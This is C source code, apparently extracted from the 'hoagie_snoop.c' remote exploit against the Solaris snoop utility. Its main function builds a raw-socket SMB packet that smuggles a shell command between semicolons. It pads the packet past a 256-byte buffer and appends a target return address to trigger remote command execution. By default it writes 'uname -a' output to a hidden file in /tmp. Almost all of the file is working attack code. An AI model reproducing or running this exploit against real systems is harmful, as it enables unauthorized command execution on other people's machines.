
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
typedef int buffer ;
struct TYPE_4__ {char* description; int address; } ;


 int AF_INET ;
 char EOF ;
 int IPPROTO_TCP ;
 int PF_INET ;
 int SMB_COMMAND_TRIGGER ;
 char SMB_HEADER_FILLER ;
 int SMB_PORT_DEFAULT ;
 char* SMB_TARGET_DEFAULT ;
 int SOCK_RAW ;
 int atoi (char*) ;
 int close (int) ;
 int exit (int) ;
 char getopt (int,char**,char*) ;
 int htons (int) ;
 int inet_addr (char*) ;
 char* optarg ;
 int printf (char*,...) ;
 int send_smb_packet (int,struct sockaddr_in*,int ,char*) ;
 int snprintf (char*,int,char*,char*) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;
 TYPE_2__* targets ;
 int usage (int,char**) ;

int main(int argc, char **argv) {
   char c;
   char *target = SMB_TARGET_DEFAULT;
   int port = SMB_PORT_DEFAULT;
   int s = 0;
   struct sockaddr_in sin;
   int i = 0;
   char buffer[1024];
   int idx = 0;
   char *command = ((void*)0);

   printf("hoagie_snoop.c - solaris snoop remote\n"
          "-andi / void.at\n\n");

   if (argc < 2) {
      usage(argc, argv);
   } else {
      while ((c = getopt (argc, argv, "hvt:p:r:i:c:")) != EOF) {
         switch (c) {
            case 't':
                 target = optarg;
                 break;
            case 'p':
                 port = atoi(optarg);
                 break;
            case 'i':
                 idx = atoi(optarg);
                 break;
            case 'c':
          command = optarg;
   break;
            default:
                 printf("[*] unknown command line option '%c'\n", c);
                 exit(-1);
         }
      }
   }

   s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
   if (s == -1) {
      printf("[*] failed to create raw socket\n");
   } else {
      sin.sin_family = AF_INET;
      sin.sin_port = htons(port);
      sin.sin_addr.s_addr = inet_addr(target);

      if (!command) {
         command = "uname -a > /tmp/.patch.your.system.txt";
      }

      printf("[*] attacking '%s' on '%s' ...\n", targets[idx].description, target);

      snprintf(buffer, sizeof(buffer), ";%s;", command);


      for (i = strlen(buffer); i < 256; i++) { buffer[i] = SMB_HEADER_FILLER; }


      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;


      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;


      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;


      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;


      buffer[i++] = targets[idx].address & 0xff;
      buffer[i++] = (targets[idx].address >> 8) & 0xff;
      buffer[i++] = (targets[idx].address >> 16) & 0xff;
      buffer[i++] = (targets[idx].address >> 24) & 0xff;

      printf("[*] execute '%s' now ...\n", command);

      send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER, buffer);

      printf("[*] done\n");

      close(s);
   }

   return 0;
}
